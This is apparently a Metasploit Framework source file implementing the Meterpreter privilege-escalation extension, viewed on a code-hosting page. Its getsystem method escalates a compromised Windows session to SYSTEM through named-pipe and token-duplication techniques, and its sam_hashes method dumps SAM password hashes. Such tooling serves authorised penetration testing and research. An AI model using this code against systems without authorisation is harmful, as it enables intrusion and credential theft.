Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb
Views: 11791
# -*- coding: binary -*-12require 'rex/post/meterpreter/extensions/priv/tlv'3require 'rex/post/meterpreter/extensions/priv/command_ids'4require 'rex/post/meterpreter/extensions/priv/passwd'5require 'rex/post/meterpreter/extensions/priv/fs'67module Rex8module Post9module Meterpreter10module Extensions11module Priv1213###14#15# This meterpreter extensions a privilege escalation interface that is capable16# of doing things like dumping password hashes and performing local17# exploitation.18#19###20class Priv < Extension2122def self.extension_id23EXTENSION_ID_PRIV24end2526TECHNIQUE = {27any: 0,28named_pipe: 1,29named_pipe_2: 2,30token_dup: 3,31named_pipe_rpcss: 4,32named_pipe_print_spooler: 5,33named_pipe_efs: 634}.freeze3536#37# Initializes the privilege escalation extension.38#39def initialize(client)40super(client, 'priv')4142client.register_extension_aliases(43[44{45'name' => 'priv',46'ext' => self47},48])4950# Initialize sub-classes51self.fs = Fs.new(client)52end5354#55# Attempt to elevate the meterpreter to Local SYSTEM56#57def getsystem(technique=TECHNIQUE[:any])58request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)5960# All three (that's #1, #2, #3 and *any* / #0) of the service-based techniques need a service name parameter61if [TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)62request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))63end6465# We only need the elevate DLL for when we're invoking the TokenDup or66# NamedPipe2 method, which we'll only use if required (ie. trying all or67# when that method is asked for explicitly)68if [TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)69elevator_path = nil70client.binary_suffix.each { |s|71elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)72if !elevator_path.nil?73break74end75}76if elevator_path.nil?77elevators = ''78client.binary_suffix.each { |s|79elevators << "elevator.#{s}, "80}81raise RuntimeError, "#{elevators.chomp(', ')} not found", caller82end8384encrypted_elevator_data = ::File.binread(elevator_path)85elevator_data = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_elevator_data)8687request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)88request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)89end9091request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)9293# as some service routines can be slow we bump up the timeout to 90 seconds94response = client.send_request(request, 90)9596technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)9798if(response.result == 0 and technique != nil)99client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')100client.update_session_info101client.sys.config.getprivs102if client.framework.db and client.framework.db.active103client.framework.db.report_note(104:host => client.sock.peerhost,105:workspace => client.framework.db.workspace,106:type => 'meterpreter.getsystem',107:data => {:technique => technique}108) rescue nil109end110return [ true, technique ]111end112113return [ false, 0 ]114end115116#117# Returns an array of SAM hashes from the remote machine.118#119def sam_hashes120# This can take a long long time for large domain controls, bump the timeout to one hour121response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600)122123response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|124SamUser.new(hash)125}126end127128#129# Modifying privileged file system attributes.130#131attr_reader :fs132133protected134135attr_writer :fs # :nodoc:136137end138139end; end; end; end; end140141142143